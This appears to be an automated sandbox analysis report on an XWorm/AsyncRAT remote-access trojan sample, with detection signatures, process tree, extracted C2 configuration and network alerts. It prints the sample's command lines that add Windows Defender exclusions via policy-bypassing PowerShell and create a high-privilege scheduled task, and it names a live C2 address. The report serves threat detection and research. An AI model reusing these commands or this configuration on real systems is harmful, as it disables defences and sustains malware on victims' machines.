
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565291
MD5: 4347fb3a5b1eabf2e594a895a30b98f4
SHA1: 36993df090a7f68c57f96ffe5724674520998ac8
SHA256: 492a7de87f0ff73da5b30a460ce1fbe03a0d7edf0634906f6a67d711b4a46751
Tags: NET, exe, MSIL, user-jstrosch

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys to launch java
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 2968 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
    • powershell.exe (PID: 5932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7008 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5392 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • java.exe (PID: 3428 cmdline: C:\Users\user\AppData\Roaming\java.exe MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 3088 cmdline: "C:\Users\user\AppData\Roaming\java.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 7016 cmdline: "C:\Users\user\AppData\Roaming\java.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 6464 cmdline: C:\Users\user\AppData\Roaming\java.exe MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • cleanup
{"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
file.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
file.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xe66c:$s6: VirtualBox
  • 0xe5ca:$s8: Win32_ComputerSystem
  • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf1f2:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\java.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\java.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\java.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xe66c:$s6: VirtualBox
  • 0xe5ca:$s8: Win32_ComputerSystem
  • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf1f2:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xe46c:$s6: VirtualBox
  • 0xe3ca:$s8: Win32_ComputerSystem
  • 0xf9c0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfa5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfb72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xeff2:$cnc4: POST / HTTP/1.1
00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf0e4:$s6: VirtualBox
  • 0xf042:$s8: Win32_ComputerSystem
  • 0x10638:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x106d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x107ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfc6a:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
0.2.file.exe.2a61cd8.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.file.exe.630000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.file.exe.630000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.file.exe.630000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xe66c:$s6: VirtualBox
  • 0xe5ca:$s8: Win32_ComputerSystem
  • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf1f2:$cnc4: POST / HTTP/1.1

                      System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\java.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\java
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2968, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", ProcessId: 7008, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5392, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:24.666364+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:28.810945+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:35.564791+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:46.628008+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:57.689916+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:58.893906+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:21:10.865014+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:24.694814+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:35.567275+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:46.631035+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:57.691756+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.822140+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.943490+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.064973+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.184921+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.306110+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.426980+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.547220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.787599+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.907672+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.027780+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.147964+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.268067+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.390386+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.512111+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.724011+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.923266+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.125543+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.246667+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.366715+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.608571+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.728572+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.848703+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.088530+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.208751+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.329282+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.449996+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.573360+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.814592+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.920478+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.040774+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.162284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.290201+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.426020+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.596157+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.720026+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.030145+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.150189+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.270211+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.372291+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.492173+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.854165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.975522+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.029420+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.149596+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.269661+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.389848+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.510254+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.630516+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.712689+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.832827+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.952909+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:07.073227+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:07.193395+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:07.313717+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:07.420599+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:07.540909+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:10.866269+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:28.810945+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:58.893906+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:59.822140+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.943490+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.064973+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.184921+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.306110+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.426980+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.547220+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
